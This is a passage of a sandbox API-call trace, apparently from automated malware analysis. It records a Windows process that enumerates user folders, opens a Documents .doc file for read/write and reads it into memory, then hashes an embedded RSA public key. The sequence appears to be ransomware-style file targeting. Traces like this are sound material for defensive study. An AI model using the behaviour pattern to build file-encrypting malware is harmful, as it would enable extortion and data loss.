hHeap=0x630000) returned 1 [0098.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce410 | out: hHeap=0x630000) returned 1 [0098.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0098.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c2d28 | out: hHeap=0x630000) returned 1 [0098.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce208 | out: hHeap=0x630000) returned 1 [0098.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b2de0 | out: hHeap=0x630000) returned 1 [0098.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2d28 [0098.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332dab0 | out: hHeap=0x630000) returned 1 [0098.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c2cb0 | out: hHeap=0x630000) returned 1 [0098.475] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0098.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2cb0 [0098.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332dab0 [0098.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332e0c8 [0098.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332dab0 | out: hHeap=0x630000) returned 1 [0098.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c2cb0 | out: hHeap=0x630000) returned 1 [0098.476] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0098.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2cb0 [0098.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332dab0 [0098.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332ddf8 [0098.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332dab0 | out: hHeap=0x630000) returned 1 [0098.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c2cb0 | out: hHeap=0x630000) returned 1 [0098.476] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0098.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2cb0 [0098.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332dab0 [0098.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x16c) returned 0x9b94968 [0098.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce208 [0098.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce410 [0098.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce750 [0098.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0098.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332de70 [0098.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce068 [0098.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332dc90 [0098.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332dc18 [0098.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332e050 [0098.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0098.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce3a8 | out: hHeap=0x630000) returned 1 [0098.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce7b8 | out: hHeap=0x630000) returned 1 [0098.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0098.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332e140 | out: hHeap=0x630000) returned 1 [0098.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c2d28 | out: hHeap=0x630000) returned 1 [0098.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332e0c8 | out: hHeap=0x630000) returned 1 [0098.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ddf8 | out: hHeap=0x630000) returned 1 [0098.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0098.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332ddf8 [0098.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332dab0 | out: hHeap=0x630000) returned 1 [0098.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c2cb0 | out: hHeap=0x630000) returned 1 [0098.477] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda9b9830, ftCreationTime.dwHighDateTime=0x1d5b7c8, ftLastAccessTime.dwLowDateTime=0xffb07ee0, ftLastAccessTime.dwHighDateTime=0x1d5bb12, ftLastWriteTime.dwLowDateTime=0xffb07ee0, ftLastWriteTime.dwHighDateTime=0x1d5bb12, nFileSizeHigh=0x0, nFileSizeLow=0x11bde, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nnD-74w.doc", cAlternateFileName="")) returned 1 [0098.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e7c0 [0098.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.477] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nnD-74w.doc") returned=".doc" [0098.477] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nnD-74w.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nnd-74w.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.477] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=72670) returned 1 [0098.477] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.481] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x11bb8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.481] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.482] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.482] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.482] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.482] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x11bde, lpOverlapped=0x0) returned 1 [0098.483] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.483] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.483] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.483] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.483] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.484] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.484] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.484] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.484] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.484] GetLastError () returned 0x0 [0098.485] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.485] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.485] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.485] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.485] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.485] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.485] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11be0) returned 0x9ba4d90 [0098.486] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.486] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d1c8 [0098.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa00 [0098.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d210 [0098.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa18 [0098.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa48 [0098.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa60 [0098.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.487] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.487] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.487] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0098.487] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa48 | out: hHeap=0x630000) returned 1 [0098.487] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa60 | out: hHeap=0x630000) returned 1 [0098.487] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.487] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.487] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.487] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.487] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0098.487] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331aa60 [0098.487] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0098.487] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331aa48 [0098.487] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0098.487] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c658 [0098.487] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.487] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.487] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.487] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c770 [0098.487] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0098.487] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.487] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0098.487] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa60 | out: hHeap=0x630000) returned 1 [0098.487] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.487] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa48 | out: hHeap=0x630000) returned 1 [0098.488] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.488] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.488] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.488] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.488] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0098.488] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.488] GetCurrentThreadId () returned 0x42c [0098.488] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.488] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8eed8 [0098.488] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.488] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.488] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.488] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.488] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.488] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0098.488] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.488] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.488] GetCurrentThreadId () returned 0x42c [0098.488] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.488] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.488] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0098.488] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.489] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.489] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.489] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.489] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0098.489] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0098.489] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.489] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318ea0 [0098.489] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.489] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0098.489] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.489] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.489] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.489] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.489] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0098.489] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0098.489] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0098.489] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.489] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0098.489] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.489] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa48 [0098.489] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.489] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0098.489] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.489] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.490] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0098.490] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0098.490] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0098.490] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa60 [0098.490] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0098.490] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0098.490] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0098.490] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa30 [0098.490] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0098.490] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.490] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.490] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.490] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.490] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.490] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.490] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331aa78 [0098.490] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.490] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a520 [0098.490] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.490] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0098.490] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.490] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0098.490] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.490] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0098.490] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa48 | out: hHeap=0x630000) returned 1 [0098.490] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa48 [0098.490] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.491] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0098.491] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.491] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0098.491] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.491] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32d0958 [0098.491] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0098.491] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c428 [0098.491] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.491] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0098.491] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa48 | out: hHeap=0x630000) returned 1 [0098.491] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x32cef08 [0098.491] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0098.491] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0098.491] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.491] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: 